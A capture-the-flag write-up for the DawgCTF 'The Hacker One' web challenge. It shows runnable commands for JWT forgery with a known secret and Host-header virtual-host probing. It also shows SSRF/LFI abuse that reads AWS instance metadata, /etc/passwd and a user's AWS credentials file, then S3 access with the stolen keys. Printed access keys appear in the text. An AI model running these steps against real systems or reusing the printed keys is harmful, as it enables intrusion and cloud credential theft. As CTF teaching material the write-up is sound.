DawgCTF - The Hacker One - Writeup
The Hacker One was a web / networking challenge in DawgCTF worth 500 points. It was written by a sponsor, HackerOne.
Initial Reconnaissance
First, as the challenge is supposed to be modelled after a bug bounty program, and as bug bounty hunting typically requires a great deal of reconnaissance, we began by port scanning umbc.h1ctf.com.
nmap umbc.h1ctf.com
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-13 20:35 PDT
Nmap scan report for umbc.h1ctf.com (13.58.251.16)
Host is up (0.092s latency).
rDNS record for 13.58.251.16: ec2-13-58-251-16.us-east-2.compute.amazonaws.com
Not shown: 997 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
Nmap done: 1 IP address (1 host up) scanned in 7.94 seconds
We decided that the SSH server on port 22 was probably meant for challenge administration rather than as an attack target.
Upon visiting http://umbc.h1ctf.com/, we discovered that the application hosted on port 80 is different from the application served on port 443.
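A quick way to confirm this is to fetch the index page of each service and compare the responses (a minimal sketch; the output file names are arbitrary):
# Fetch the landing page of each service and diff them; the two
# responses differed, indicating two separate applications.
curl -s  http://umbc.h1ctf.com/  -o http_index.html
curl -sk https://umbc.h1ctf.com/ -o https_index.html
diff http_index.html https_index.html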
We ran a directory fuzzer on both servers:
dirsearch -u https://umbc.h1ctf.com/ -e .js
[20:39:56] 401 - 49B - /debug
[20:40:07] 200 - 3KB - /login
[20:40:17] 401 - 49B - /profile
[20:40:18] 200 - 2KB - /register
dirsearch -u http://umbc.h1ctf.com/ -e .php
[20:38:40] 200 - 154B - /debug
[20:38:46] 200 - 39B - /home
[20:39:03] 200 - 35B - /reports
[20:39:10] 200 - 35B - /reporters
Although /reports and /reporters required authentication to access, the page at http://umbc.h1ctf.com/debug did not:
{
"date": "Tue Apr 14 03:43:50 UTC 2020",
"host": "Linux 5a93f1013fbb 4.15.0-1057-aws #59-Ubuntu SMP Wed Dec 4 10:02:00 UTC 2019 x86_64 GNU/Linux"
}
Bypassing Login
At this stage, we knew that the /debug and /profile routes on the HTTPS server accepted JWTs in the access_token_cookie cookie.
The hint added to the challenge (coincidentally, just as we got to this stage) stated that the string h1ctfsecret would be useful. We used this secret with the HS256 JWT algorithm to sign a token, allowing us to access the /profile and /debug routes on the HTTPS server.
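Forging the token is straightforward from the shell. The sketch below assumes the application only checks for a valid HS256 signature; the identity claim is an illustrative guess, not necessarily the exact payload we used:
b64url() { base64 | tr -d '=' | tr '/+' '_-' | tr -d '\n'; }   # base64url helper

header=$(printf '{"alg":"HS256","typ":"JWT"}' | b64url)
payload=$(printf '{"identity":"attacker"}' | b64url)           # illustrative claim
sig=$(printf '%s.%s' "$header" "$payload" \
      | openssl dgst -sha256 -hmac 'h1ctfsecret' -binary | b64url)

# Present the forged token in the access_token_cookie cookie
curl -sk -H "Cookie: access_token_cookie=$header.$payload.$sig" https://umbc.h1ctf.com/profile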
Discovering Swagger Documentation
Another hint revealed that the documentation was located on “another castle”. We suspected that the server was using virtual hosts; in particular, connecting to the server on port 80 produced different results than connecting on port 443. We could control which virtual host we reached by sending a manipulated Host header.
A further hint suggested that the documentation was in a default, standard location. Swagger is one of the more common endpoint documentation engines, so we started testing various endpoints and virtual hosts.
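A rough sketch of that testing; the subdomains, domains, and documentation path below are examples rather than the exact wordlists we used:
ip=13.58.251.16
for sub in docs api swagger admin internal; do
  for dom in h1ctf.com rbtrust.internal ctf.internal; do
    code=$(curl -s -o /dev/null -w '%{http_code}' \
           -H "Host: $sub.$dom" "http://$ip/swagger.json")
    echo "$sub.$dom -> $code"
  done
done
Any virtual host that returned something other than the default response stood out immediately.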
Eventually, we found the documentation at http://swagger.rbtrust.internal/swagger.json:
curl --resolve swagger.rbtrust.internal:80:13.58.251.16 http://swagger.rbtrust.internal/swagger.json
Exploiting LFI
Through the Swagger documentation, we discovered a local file inclusion (LFI) / server-side request forgery (SSRF) vulnerability via the url_48902 parameter of the /debug endpoint on the server running on port 80.
We began by searching for common log and configuration files. Although some of them were readable, none proved useful. We also leaked the application's source code through the LFI and determined that it contained no further vulnerabilities.
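In practice that searching looked roughly like the loop below; the candidate paths are examples, and we are assuming (as the responses later in this writeup show) that /debug returns the fetched content in a JSON field named url:
for path in /etc/passwd /etc/nginx/nginx.conf /var/log/nginx/access.log /proc/self/environ; do
  echo "=== $path ==="
  curl -s --resolve api.ctf.internal:80:13.58.251.16 \
       "http://api.ctf.internal/debug?url_48902=file://$path" | jq -r .url
done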
First, through the SSRF, we queried the AWS metadata API and confirmed that the host was an EC2 instance:
curl --resolve api.ctf.internal:80:13.58.251.16 http://api.ctf.internal/debug?url_48902=http://169.254.169.254/latest/dynamic/instance-identity/document | jq -r .url
{
"accountId" : "968410616521",
"architecture" : "x86_64",
"availabilityZone" : "us-east-2b",
"billingProducts" : null,
"devpayProductCodes" : null,
"marketplaceProductCodes" : null,
"imageId" : "ami-0fc20dd1da406780b",
"instanceId" : "i-0f1eba3cb5792ea0e",
"instanceType" : "t2.2xlarge",
"kernelId" : null,
"pendingTime" : "2020-03-02T19:13:37Z",
"privateIp" : "172.31.27.125",
"ramdiskId" : null,
"region" : "us-east-2",
"version" : "2017-09-30"
}
Then, we exfiltrated the /etc/passwd file and discovered a user named jobert:
curl --resolve api.ctf.internal:80:13.58.251.16 http://api.ctf.internal/debug?url_48902=file:///etc/passwd | jq -r .url
jobert:x:1000:1000:,,,:/home/jobert:/bin/bash
Finally, as we knew that this server was an EC2 instance and that there was a user named jobert, we used the same file:// LFI to check whether AWS credentials were stored in /home/jobert/.aws/credentials:
[default]
aws_access_key_id = AKIAXTCZF54KXK7B3SKQ
aws_secret_access_key = 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
Finding an S3 Bucket
We started enumerating the resources that the AWS keys had access to. Because the keys had very little access otherwise, we assumed they were intended for accessing an S3 bucket. However, we did not know the name of the bucket, and the keys did not have permission to call the ListBuckets S3 operation.
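A minimal sketch of that enumeration with the AWS CLI:
export AWS_ACCESS_KEY_ID=AKIAXTCZF54KXK7B3SKQ
export AWS_SECRET_ACCESS_KEY='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'

aws sts get-caller-identity   # confirm the key works and see which principal it maps to
aws s3 ls                     # denied: the key cannot call ListBuckets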
Based upon the URLs in the /profile and /debug pages on the HTTPS server, we looked for S3 bucket names that would make sense for the RBtrust application. We eventually found the rbtrust-internal bucket based upon the https://rbtrust.internal bug report in /profile.
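Without ListBuckets, candidate bucket names have to be tested one at a time; the names other than rbtrust-internal below are illustrative guesses:
for bucket in rbtrust rbtrust-reports umbc-rbtrust rbtrust-internal; do
  echo "=== $bucket ==="
  aws s3 ls "s3://$bucket/" && echo "accessible: $bucket"
done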
The AWS credentials had permission to list the files in the bucket, revealing a file named flag.txt.
We downloaded this file from S3, and it contained the flag.
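Assuming the same credentials exported above, listing and retrieving the flag comes down to:
aws s3 ls s3://rbtrust-internal/             # reveals flag.txt
aws s3 cp s3://rbtrust-internal/flag.txt -   # print the flag to stdout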
flag{get_em_uPy4TWP1SQlcaukrU8GPe}